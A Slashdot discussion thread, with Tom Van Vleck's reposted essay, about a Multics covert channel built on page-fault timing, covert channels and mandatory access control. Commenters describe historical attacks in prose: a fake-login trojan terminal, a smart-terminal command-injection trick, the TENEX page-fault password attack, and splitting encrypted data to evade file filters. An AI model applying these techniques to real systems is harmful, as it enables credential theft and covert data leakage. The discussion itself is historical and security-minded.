Surreptitious Communication via Page Faults 128
Martin Pomije writes "This is a really interesting story illustrating how a shared resource can also be a communication channel. If you have any interest in software design or operating systems, the Multics web site is worth your time. Tom Van Vleck has obviously put a lot of time into this and deserves credit for making all of this information available. " It's like 10 years old, but it's really interesting.
Re:Why do we glorify cracking when its in the past (Score:1)
"trojan terminal" (Score:1)
Re:Surreptitious Communication via Slashdot (Score:1)
...And do you really think the moderators will fall for something so simplistic?
[...]
Damn, I wish I had thought of this one first!
---
pb Reply or e-mail; don't vaguely moderate [152.7.41.11].
Re:breaking passwords ? (Score:1)
Re:Slashdoted? Sorta. (Score:1)
Re:covert channels and mandatory access controls (Score:1)
--
Re:Communication channel from kernel to user space (Score:1)
Other than that, thumbs up. Never used Multics, so I can't say whether
that part's right, but it sounds plausible
#define X(x,y) x##y
DoS as a medium of communication (Score:1)
--
Re:Surreptitious Communication via Slashdot (Score:1)
signed executables? (Score:1)
fnord.
Can somebody please post the original content? (Score:1)
Bummer !
I came in late and the page is already "closed". Looks like the ISP "Best" or whatever isn't that good - they close down page access just when it starts to get interesting.
Can anyone please post the original content of that page? I'd love to know the details.
Thanks in advance !!
Re:covert channels and mandatory access controls (Score:1)
Re:breaking passwords ? (Score:1)
But what used to be real fun in VMS, was to
malloc a ton of memory and write it to a file.
You could catch peoples email, and files. Since
the system didn't zero the pages at that time.
The (lack of) medium IS the message. (Score:1)
See, the article was submitted to
Slashdotting can be thought of as a form of communication. It's also the sincerest form of flattery on the Internet.
Re:yeah but so what (Score:1)
itachi
Re:Quite interesting. (Score:1)
-----------
"You can't shake the Devil's hand and say you're only kidding."
Linux scores again... (Score:1)
LINUS :
Logical Inquiry and Update System.
Java -- Re:signed executables? (Score:1)
Isn't this pretty much what Java does, but with less effort required on the part of the code producer than proof-carrying code? So JavaOS is an OS which has the capabilities you're inquiring about.
The jvm takes the bytecodes when it loads them and runs them through a theorem-prover to verify that the code doesn't do anything illegal, and when the code gets run, the Java security model works so that any attempt by the code to access system resources is checked by the security manager before being permitted.
When you combine this with the fact that, as of jdk1.2, developers can easily create custom privileges for their apps and then can require mobile code which requires those privileges to be signed by a trusted party, you get a system that seems to me to be much more powerful and easy to use than the one in the paper on proof-carrying code.
Re:Covert channels, bandwidth and trojan spooks (Score:1)
Re:Covert channels, bandwidth and trojan spooks (Score:1)
> supply of frozen pizzas and an oven, or even an
> in-house pizzeria. Sounds like a good > excuse to me.
But TEMPEST shielding does not cover pizza smells.
This means somewhere someone is spending lots of my tax money on TEMPER (Transient EMitted Pizza Essence Remover)
Re:signed executables? (Score:1)
OS-9 [microware.com] from miroware used to do CRC16 on code before it would load or run a module on the 6809 (8 bit cpu).
This concept could be extended today but would require a bit more work becuase modern programs don't load in the whole bit of code before running. How would this work? You could add a crypto key to the file header that had a signing key and then MD5 each block but how would the VM system deal with extra data in the blocks? For code blocks you can tell GCC to waste the last 4 bytes of a vm block (as done on the 32016) but it involes a bunch of jumps that new CPUs don't do so well. The other choice is to simply make the VM system load the needed block plus the next bytes off the disk and do an MD5 like thing with the block and signing key and then throw away the block that has the key in it but that blows away any one to one relationship between disk images and memory.
Reminds me of Heinlein's "Friday" signaling bit (Score:1)
The message about slashdot posting is more like this. Post a message in public that only the receiver will know what to do with.
What is old, will be new again (Score:1)
First, the classic book on Multics - The Multics System; An Examination of Its Structure by the late Elliott Irving Organick is a snap-shot of a work in progress. If you've read the book, you'll have a good feeling for what the group was doing, but not particularly of what Multics finally turned out to be.
Second, there is recurring discussion in the USENET news group alt.os.multics about a re-implementation of the Multics hardware environment (including tagged memory) on something like a PCI card. Then use the PC as the I/O system. This, of course, is possible because ASICs and DRAM are perpetually getting less and less expensive. The acutal ownership of Multics will have to be worked out before that can happen. Someone should enourage the present owners to GPL the source and binaries.
It always strikes me sad that Multics is old, but its O/S ideas are, in large part, state of the art. It says something pretty vile about contemporary O/S and architechture research, experimentation and design. VonNeuman CPUs and Unix are not horrible designs (thus they've been successfull), but if we want orders of magnitude improvements now, then it is time to re-evaluate the basics. Seymour Cray came up with the majority of the improvements (hacks if you will) to the Von Neuman architechture in the 1960s and 70s. Intel (et al) has been living off those ideas for two decades. It's time for new ideas (yes, perhaps like the late Intel ipex-432).
Finally, I wish Linus had read about Multics, before he re-implmented Unix. We'd all be in better shape if that were the case. Then Linux could genuinely be said to be state of the art, not just state of the practice.
The Slashdot Effect (Score:1)
I can't currently get to the US mirror either, so I am not including the link here.
Re:Surreptitious Communication via Slashdot (Score:1)
That's simply not true. Just take the Socialist Worker's Party or the Socialist Party, both in Britain. Both "revolutionary", although the first believes in violence, the latter in getting elected.
Unfortunately, both words have become extremely corrupted and debased this century by Cuba, the Soviet Union and China, who were and are not truly socialist (my definition of socialism includes participatory democracy). Even more unfortunately, there isn't a better word for the political view that I support than socialism.
Re:breaking passwords ? (Score:1)
This particular exploit actually used the "page faults per process" metric provided by the OS, rather than the timing information, IIRC.
Communication channel from kernel to user space (Score:1)
An acquaintance of mine told me that he had broken into a multics system by writing a driver which a) did the driver's job and b) read the password file and communicated it one bit at a time to a user-space program via toggling rwx bits in some file known to both driver and user program.
He was smart enough that it was probably true.
Re:Slashdoted? Sorta. (Score:1)
Re:CmdrTaco is a valley girl? Like totally! (Score:1)
Re:breaking passwords ? (Score:1)
PDP-10 (the 36-bit line of PDP's).
Actually, this can also be found in AST's
Minix Book
Re:yeah but so what (Score:1)
Yup. IPC and all that (not to mention just leaving a file with any kind of data you want in
Re:Communication channel from kernel to user space (Score:1)
1) If his 'driver' had access to the password file, why did it waste time by sending it one bit at a time??
2) If the people that ran that system trusted him SO greatly to..... not check his driver code?
Anyways, that wasn't a very incredible feat, imho.
It's two system calls (i.e., read and chmod on the driver side and a lstat? on the client side).
Re:breaking passwords ? (Score:1)
Steff
yeah but so what (Score:1)
Re:Covert channels, bandwidth and trojan spooks (Score:1)
To be completely fair/let noone know you get aroused by beautiful women/not insult anyone, you also have to run into the water with ugly women...
Just an analogy...
Never thought my running into the water was actually covering up a covert comm-channel!
i beg to differ! (Score:1)
sincerely,
most slashdotters
It was posted above (Score:1)
Re:Why do we glorify cracking when its in the past (Score:1)
Yeah, they get paid for it.
Welcome to the bottom line, folks.
Data reader certification (Score:1)
File encryption always helps. You can encrypt your data file into something that looks like a text document (even document that has some text meaning) then take the document apart into small pieces and send those pieces in no particular order. By themselves the pieces will not have any special meaning and will look benign to the file filters and detectors.
You must always think ahead
Quite interesting. (Score:1)
With the way things are going, how can we know what information will still be "legal" next month. At least for those of us in the US, it might be a good idea to start forming some way of maintaining freedom in spite of the courts and big business.
If we have to choose which book to become, I'll become a fanfic long-form story set in the DBZ universe (I love the author; well, at least what I've read so far).
-Nathaniel
Re:Covert channels, bandwidth and trojan spooks (Score:1)
Countries who care what the US is up to always know when something important is about to happen, because the number of late-night pizzas delivered to offices at the Pentagon and State Department skyrockets.
It doesn't seem too covert, though. After all, the spy school instructors knew all about it and it was a common joke throughout the US intelligence community.
Chris
Re:Surreptitious Communication via Slashdot (Score:1)
The difference is that communists want to achieve their goal with a revolution whereas socialists believe in a more graduate change.
So is Linux socialistic or communistic? I think more socialistic (unless you count the 'nuke redmond' attitude most slashdotters have).
Grtz, Jeroen
Re:Surreptitious Communication via Slashdot (Score:1)
A lot of communists (the real kind) today call themself socialist because communism stands for a totalitarian regime for most people.
Grtz, Jeroen
p.s. I regard myself a socialist to (the non-violant, pro-democracy kind)
Re:Why do we glorify cracking when its in the past (Score:1)
same reason they should care if i got shot
doesnt SGI use this? (Score:1)
Communications via GPF's (Score:1)
Sounds workable (Score:1)
-- Ben
Covert channels (Score:1)
Re:Please think before moderating... (Score:1)
Re:covert channels and mandatory access controls (Score:2)
Secondly, any time two people have access to the same area, be it a physical area or shared computing resource, there is the risk of covert communications. The only way to prevent it is to remove access to all but one person.
Multics was designed primarily to share expensive computing resources. Computing resources are much cheaper now, so it is more feasible to prevent covert communications by just plain not sharing. Each person in a hypersecure installation would have their own computer, without even a conventional LAN, with communications between the systems being tightly controlled and monitored.
----
Another good Multics story... (Score:2)
Re:Communication channel from kernel to user space (Score:2)
The easiest way to get a password in Multics was the old "trojan terminal" trick. Multics was usually accessed via crowded terminal rooms, and there was often a waiting list to get on (remote access back then was very expensive and few Multics installations had any remote access). Log in, run your trojan (which put up a fake login prompt), walk away. Someone else jumps on your "open" terminal, tries their personid, projectid, and password, gets 'login incorrect' message (at which point your program surreptuously exits and logs out, having saved the data to a file somewhere), and then they get the "real" login prompt. Classic, simple, almost undetectable!
Of course, that wasn't the holy grail. The holy grail was getting one of the operators' passwords, or somehow executing commands as an operator to create a ring0 gate for you (basically same as creating a suid root /bin/sh). I'm trying to remember whether it was Multics that someone tried the "smart terminal" attack on, or whether we'd already moved to Unix by that time. The TVI912 terminal would transmit the contents of its screen to the remote system when you sent ESC-7. So send a clear screen, the commands to be executed, and then ESC-7 as the payload of a Unix "write" command (or Multics equivalent -- still trying to remember whether Multics had an equivalent, darn it!), and guess what happens? (Oh, make sure to clear the screen again after you've sent the payload!). Of course, after the first time, the operators remembered to turn off messages ("biff n" on Unix) :-).
-E
Re:Glad to see some credit given to Multics ... (Score:2)
As I remember, System/360 storage keys were associated with large (4K?) regions of memory; they weren't associated with individual words, as tags are on the Burroughs machines (and their successors) and on the PowerPC AS/400's. I tend to think of "tags" as applying to individual words; do storage keys protect down to the word level on S/390?
Re:Glad to see some credit given to Multics ... (Score:2)
It's in the PowerPC AS/400's [ibm.com], at least according to Frank Soltis' Inside the AS/400 book - there are tag bits in the extended PowerPC architecture used in the AS/400's.
It's also presumably still in the the Unisys ClearPath LX [unisys.com] and ClearPath NX [unisys.com] series, which include processors that are presumably the latest generation of the line of machines that started with the Burroughs mainframes.
Re:Please think before posting (Score:2)
No, it didn't.
The poster to whom you're responding was mistaken; they didn't use XML, they used SGML.
(Or, as the banner on this site should perhaps read:
Slashdot
YHBT. YHL. HAND.)
What are you trying to secure? (Score:2)
Covert channels are not a security risk if your question is keeping the wrong person from getting in control of your computer.
Cheers,
Ben
a real life example (Score:2)
Finding stuff in unused disk blocks (Score:2)
One time I did a disk dump from the raw disk device to the console, and after a few pages of binary gibberish, out came several pages of operating system kernel source code! Apparently, Digital, when it made up the master disk for the operating system binary distribution, reused a floppy that had previously contained operating system source code, and never bothered to zero out the disk. Interesting stuff!
Re:covert channels and mandatory access controls (Score:2)
Different problem. TEMPEST is concerned with information leakage via electro-magnetic radiation.
Covert channels are a concern in multi-level secure systems where information of different classifications and compartments are processed on a single system. A process running in a Top Secret context should not be able to send classified information to a process running in a Confidential context.
Re:Finding stuff in unused disk blocks (Score:2)
Doing a fresh 'Save As' was a fine work-around, but most people were shocked when I point this out to them.
Re:breaking passwords ? (Score:2)
Re:Slashdoted? Sorta. (Score:2)
The total amount is compared against the last 24 hours, computed on the hour. Check just after the hour and you may get thru, before he's back over the limit again.
This is just like any other quota system to keep one user from hogging an unfair share of the available resources, in this case bandwidth, hits or cgi cpu cycles.
Re:Quite interesting. (Score:2)
-----------
"You can't shake the Devil's hand and say you're only kidding."
breaking passwords ? (Score:2)
Re:yeah but so what (Score:2)
Most B2 systems have several user groups and each are in a different Security Realm. You can be in several Realms and you may be able to copy info from one area to another but generlay you cant go the other way without downgrading the data which of course requires other levels of access. Real access control is not easy to do and is very, very complicated.
When I ran a news server for the AF I used to feed news to a B2 certifed system. I never new if it got the news or not because it never responded. It had a dedicated hunk of hardware that did TCP/IP and simply acked everything. It was like sending bits off into the ether.
Re:Quite interesting. (Score:2)
So the question becomes, how can I not get caught? Spreading information via covert channels (the technical term for this sort of communication) makes it very hard for said agents to even suspect my actions, and to gather evidence for a conviction.
(Note to my fans in domestic surveillance: only kidding, everyone knows I'm a good law-abiding American.)
Slashdoted? Sorta. (Score:2)
Sorry, temporarily closed
My internet service provider, Best Internet Communications, limits the number of hits and the bandwidth each web site can consume, and my site is past its limit.
http://www.multicians.org:80/limit.html
Write only files (Score:2)
Sorry guys (Score:2)
Re:covert channels and mandatory access controls (Score:2)
Actually, this doesn't affect most Slashdot users because the operating systems they use have such lousy security that there are far easier attacks than using a covert channel. This applies to all the UNIX variants and all the Microsoft products. (Yes, it does. If it didn't, there wouldn't be new CERT advisories every week.)
There are solutions to the covert channel problem, but people hate them. Applications have to be denied access to an accurate timebase, which means no clock with resolution finer than a second, introducing deliberate jitter into the CPU dispatching, and adding some random delay to I/O operation responses. Forget playing games or multimedia.
The big win is that in a system with mandatory security and covert-channel protection, even if a virus or trojan horse gets access to secured data, it can't get the data out of the box.
I used to develop secure operating system kernels for a DoD contractor. The current state of operating system security is worse than it was twenty years ago. Users will choose animated penguins over security. What passes for "computer security" today is mostly aimed at keeping amateurs from blatantly interfering with servers. And it can't even do that successfully. A serious attack is much more subtle.
In the DoD world, one worries about two main threats. The intelligence community worries about the attacker obtaining some information they have without an alarm being raised. The military worries about the attacker interfering with their systems at a time chosen by the attacker, probably at a key moment of a military operation. The attacker is assumed to have enough resources to duplicate the systems being attacked and to practice on them. There's also the assumption that physical and computer intrusions might be used together.
Enough rant for now. Go read some NSA evaluations of security products. [ncsc.mil]
Re:Covert channels, bandwidth and trojan spooks (Score:2)
This actually sounds like just a special case of traffic analysis. Traffic analysis is one thing that you can do if you can intercept but not decrypt your enemy's transmissions. When his signal traffic increases suddenly, you know something is up.
If you really want to be paranoid about signal security, you have to send out a background of boring messages at least as big as your expected peak traffic. You could, for instance, send out messages that said "Ignore me" padded with whitespace (and then encrypted) at periodic intervals. When you actually want to send a real message, you'd substitute your real message for one of the fake ones. Of course this is something that computers are very good for; they can mimic the length patterns of real messages and automatically ignore the bogus received messages.
By analogy, the State and Defense departments could constantly order late night pizzas even when nothing interesting was going on. A more practical alternative would be to have a supply of frozen pizzas and an oven, or even an in-house pizzeria. Sounds like a good excuse to me.
duh, there are MIRRORS (Score:2)
ftp://ftp.stratus.com/pub/vos/multics/tvv/timing-c hn.html
bah. why repost an article when a URL will do?
Re:signed executables? NO, Use Proof Carrying Code (Score:3)
http://www.cs.cmu.edu/~petel/papers
Glad to see some credit given to Multics ... (Score:3)
I was able to use Multics for four years in college, and that experience gave me more insight and wisdom than any four years spent with Unix, Windows, or MacOS.
(In the areas of system design, that is! The only graphics expertise I gained from Multics was how to do simple bitmap images using the lineprinter!)
An unapologetic former Multician,
Stan Chesnutt
Re:Communication channel from kernel to user space (Score:3)
...and, at least in the older processors only in a segment tagged as a segment whose code should run in "master mode"; even most of the ring 0 code couldn't execute privileged instructions - it could only call small routines in one of those segments (said segments were, presumably, inaccessible outside of ring 0). The entry for "privileged mode" in the Multics site (well, mirror site at Stratus, anyway) glossary [stratus.com] says:
Hardware and/or microcode - the GE 645 and 6180 had no microcode; the Multics site glossary entry for the 6180 [stratus.com] says:
Here's a digusting Example (Score:3)
Re:Slashdoted? Sorta. (Score:3)
Tom Van Vleck
About 1976, I was explaining Multics security to a colleague at Honeywell. (This was before it got the B2 rating, but the mandatory access control mechanism was present.) I explained the difference between storage channels and timing channels, and said that timing channels weren't weren't important because they were so slow, noisy, and easily clogged, that you couldn't send a signal effectively.
My friend, Bob Mullen, astounded me a few days later by showing me two processes in the terminal room. You could type into one and the other would type out the same phrase a few seconds later. The processes were communicating at teletype speed by causing page faults and observing how long they took. The sender process read or didn't read certain pages of a public library file. The receiver process read the pages and determined whether they were already in core by seeing if the read took a long or short real time. The processes were running on a large Multics utility installation at MIT under average load; occasionally the primitive coding scheme used would lose sync and the receiver would type an X instead of the letter sent. If you typed in "trojan horse," the other process would type "trojan horse" a little later, with occasional X's sprinkled in the output.
Bob pointed out that noise in the channel was irrelevant to the bandwidth (Shannon's Law). Suitable coding schemes could get comparable signalling rates over many different resource types, despite countermeasures by the OS: besides page faulting, one could signal via CPU demand, segment activation, disk cache loading, or other means.
When I thought about this I realized that any dynamically shared resource is a channel. If a process sees any different result due to another process's operation, there is a channel between them. If a resource is shared between two processes, such that one process might wait or not depending on the other's action, then the wait can be observed and there is a timing channel.
Closing the channel Bob demonstrated would be difficult. The virtual memory machinery would have to do extra bookkeeping and extra page reads. To close the CPU demand channel, the scheduler would have to preallocate time slots to higher levels, and idle instead of making unneeded CPU time available to lower levels.
Bob and I did not compute the bandwidth of the page fault channel. It was about as fast as electronic mail for short messages. A spy could create a Trojan Horse program that communicated with his receiver process, and if executed by a user of another classification, the program could send messages via timing channels despite the star-property controls on data.
The rules against writing down were designed to keep Trojan Horse programs from sending data to lower levels, by ensuring that illegal actions would fault. In this case, the sender is doing something legal, looking at data he's allowed to, consuming resources or not, and so on. The receiver is doing something legal too, for example looking at pages and reading the clock. Forbidding repeated clock reading or returning fake clock values would restrict program semantics and introduce complexity.
I believe we need a mechanism complementary to the PERMISSION mechanism, called a CERTIFICATION mechanism. This controls the right to Execute software, while permission controls the Read and Write flags. A user classified Secret is not allowed to execute, at Secret level, a program certified only to Unclassified. Programs would only be certified to a given level after examination to ensure they contained no Trojan Horses. This kind of permission bit handling is easy to implement, and if the site only certifies benign programs, all works perfectly.
How do we examine programs to make sure they have no Trojan Horses? The same way we examine kernels to make sure they don't. Examining application code to ensure it doesn't signal information illegally should be easier than the work we have to do on a kernel.
Do we need to forbid write down for storage, if we allow write down via timing channels? It's inconsistent to forbid some write down paths and allow others. The main reason for preventing write down is not to stop deliberate declassification (a spy can always memorize a secret and type it into an unclassified file), it's to protect users from Trojan Horse programs leaking information. The certification approach solves this problem adifferent way, by providing a way to prevent execution of Trojan Horse programs.
Who should be allowed to certify a program to a given level? I think anyone who can create a program to execute at level X should be able to take a lower level program and certify it to level X. We can't stop a malicious user from creating a transmitter program, unless we forbid all program creation at level X. Other policies are possible; a site could centralize all program certification as a security officer responsibility. In any case, the OS should audit every certification and store the identity of the certifier as a file attribute.
[1] Honeywell, Multics Security Administration manual ####.
[2] Bell, D. E. and L. J. LaPadula, Computer Security Model: Unified Exposition and Multics Interpretation, ESD-TR-75-306, Hanscom AFB, MA, 1975 (also available as DTIC AD-A023588).
[3] Bell, D. E., and L. J. LaPadula, Secure Computer Systems: Unified Exposition and Multics Interpretation, Mitre Technical Report MTR-2997, rev 2, March 1976.
[4] Biba, K. J., S. R. Ames, Jr., E. L. Burke, P. A. Karger, W. R. Price, R. R. Schell, W. L. Schiller, The top level specification of a Multics security kernel, WP-20377, MITRE Corp, Bedford MA, August 1975.
Re:Glad to see some credit given to Multics ... (Score:3)
In many ways we of the Present have NIH syndrome. It can't be good unless it's new. But you know what they say...
A month in the lab can often save an afternoon in the Library.
Say, whatever happened to tagged storage?
Regards, your friendly neighbourhood cranq
Re:yeah but so what (Score:3)
Re:Covert channels (Score:3)
at erights.org [erights.org]
The computer security fact forum [caplet.com]
Covert channels, bandwidth and trojan spooks (Score:4)
The classic tradeoff between probability of detection and bandwidth of the covert channel operates here, but if the amount of data which needs to be communicated is low then the trojan spook always wins against the guardian.
On the other hand, detection of the covert communication is an interesting problem in its own right, because it boils down to the problem of telling the remote party exactly where to find the significant data among gigabits of obfuscation --- effectively the same problem as key exchange in crypto!
Valid Link here (Score:4)
See alternate location [stratus.com].
Surreptitious Communication via Slashdot (Score:5)
Program A writes to a random thread [slashdot.org].
Program A-2 loads the thread, and moderates up the post, using karma from it's auto-"Linux is not socialist" post feature (such posts are always informative).
Program B (the reciever) loads the thread likewise, using Highest Scores First, and reads the posts marked up to two. It then leaves a "Linux is socialist" post. Invariably, a moderator will find this, take offence, and moderate it down.
Program A will, by continuosly re-loading the thread, notice the new (Score: -1, Troll) post, and will be assured that the communication was successful. Program execution will then continue as normal.
Hmmm...maybe I should patent it.
Re:breaking passwords ? (Score:5)
Yes, there was a paper by Butler Lampson on system design (it was in the proceedings of some conference, I think, published in an issue of some ACM SIG's journal; alas, I no longer have the journal issue in question) about that.
As I remember, this was on TENEX, and was an unintended consequence of a feature allowing an application to catch (or, at least, be notified of) page faults - or it may have been protection faults (e.g., SIGSEGV or SIGBUS on UNIX) - from userland.
Files, if I remember the paper correctly, could be protected with a password in TENEX, and you specified the password in the call to open the file.
Normally, you'd have to cycle each character of the password independently, in order to try a brute-force password search.
However, the code that did the password checking would, if I remember the paper correctly, fetch a character of the password, check it, and either fail immediately or continue on fetching the next character and checking it.
You could then try opening the file with an N-character password, with the second character placed so that the fault in question would occur if the system tried to fetch it (i.e., either on the next page, or not in the address space if the fault wasn't just a "page me in" fault). You'd start with the first legal character value for all characters.
If the attempt to open the file succeeded, you win.
If it fails without a fault, you know that it didn't bother trying to fetch the next character, and therefore you know that the first character wasn't the right one; you'd then replace it with the next character value, and try again.
If it fails with a fault, you know that it did try to fetch the next character, and therefore you know that the first character is the right one. You then set up a password with that character as the first character, and with the second character being the first legal character value, and with the third character being on the next page, and repeat the process with the second character.
covert channels and mandatory access controls (Score:5)
In the DoD, for instance, there are situations where you would want to do this. You don't want to allow someone viewing Top Secret data to have their information leaked to someone who isn't cleared for it.
This is why Mandatory Access Controls were invented. A lot of slashdotters have probably heard of the Orange Book, in which the DoD laid out a method of classifying the security model of computer systems. Unix variants are roughly C-1'ish, which DoD doesn't even certify anymore. OSes with ACLs and such (like NT) are roughly C-2'ish (now whether NT actually gets the job done or not is up for debate). Once you get to the B and A levels, you have Mandatory Access Controls. They are designed to prevent one user from leaking classified data to another person. In a MAC system, you should not be able to "chmod" or "chown" a file to allow someone else to view it.
It goes a little bit deeper, though. You also need to protect against more subtle methods of communication, called covert channels. In a covert storage channel, a user would fill up a disk and another user would be able to tell, or one would write to a file that another had access to read, or one would twiddle a file lock. In a covert timing channel, one user would perform a CPU intensive process and the other user would be able to tell that the responsiveness of the system changed, or the user would perform an I/O intensive application and the other user would be able to tell that his own disk accesses were more or less responsive. In this way, users can communicate via manipulating shared resources.
It's not very sexy, but it is something that DoD and the intelligence community in particular care very much about. As you can guess, these aren't easy problems to solve (if they are solvable at all).
Alternate Link (Score:5)